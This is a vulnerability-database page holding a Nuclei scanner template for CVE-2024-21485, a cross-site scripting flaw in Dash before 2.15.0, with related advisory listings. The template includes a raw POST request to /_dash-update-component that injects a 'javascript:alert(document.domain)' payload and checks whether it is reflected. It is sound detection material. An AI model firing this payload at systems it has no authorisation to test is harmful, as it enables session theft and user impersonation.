Lucene search
K

Dash Framework - Cross-site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Dash Framework before 2.15.0 is vulnerable to Cross-site Scripting, risking data theft and impersonation.

Related
Refs
Code
ReporterTitlePublishedViews
Family
AlpineLinux
CVE-2024-21485
2 Feb 202405:00
alpinelinux
Circl
CVE-2024-21485
2 Feb 202406:31
circl
CNNVD
Dash Cross-Site Scripting Vulnerability
2 Feb 202400:00
cnnvd
CVE
CVE-2024-21485
2 Feb 202405:00
cve
Cvelist
CVE-2024-21485
2 Feb 202405:00
cvelist
EUVD
EUVD-2024-0032
3 Oct 202520:07
euvd
Github Security Blog
Dash apps vulnerable to Cross-site Scripting
2 Feb 202406:30
github
NVD
CVE-2024-21485
2 Feb 202405:15
nvd
OSV
CVE-2024-21485
2 Feb 202405:00
osv
OSV
GHSA-547X-748V-VP6P Dash apps vulnerable to Cross-site Scripting
2 Feb 202406:30
osv
Rows per page
id: CVE-2024-21485

info:
  name: Dash Framework - Cross-site Scripting
  author: Lee Changhyun(eeche)
  severity: medium
  description: |
    Dash framework versions before 2.15.0 are vulnerable to Cross-site Scripting (XSS) via href attribute in anchor tags. This template tests for javascript:alert payload injection.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21485
  impact: |
    Data theft from users who access the compromised view and Access token stealing allowing attacker to impersonate users
  remediation: |
    Upgrade to dash version 2.15.0 or later
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-21485
    cwe-id: CWE-79
    epss-score: 0.01475
    epss-percentile: 0.7071
    cpe: cpe:2.3:a:plotly:dash:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
  tags: cve,cve2024,dash,xss,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "dash-core-components"
          - "_dash-component-suites"
        condition: or
        internal: true

  - raw:
      - |
        POST /_dash-update-component HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json

        {"output":"link-output.children","inputs":[{"id":"link-input","property":"value","value":"javascript:alert(document.domain)"}]}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "props"
          - "children"
          - "type"
          - "javascript:alert(document.domain)"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022002c70455ce15f88616e54457329e23ef714dd0e424fe786aeda73179d25e910d022100f944d00e3bff034534ccb245ac6b86774ed212706f25d5b4bd9c70070adb042c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.15.4 - 6.5
EPSS0.01475
SSVC
19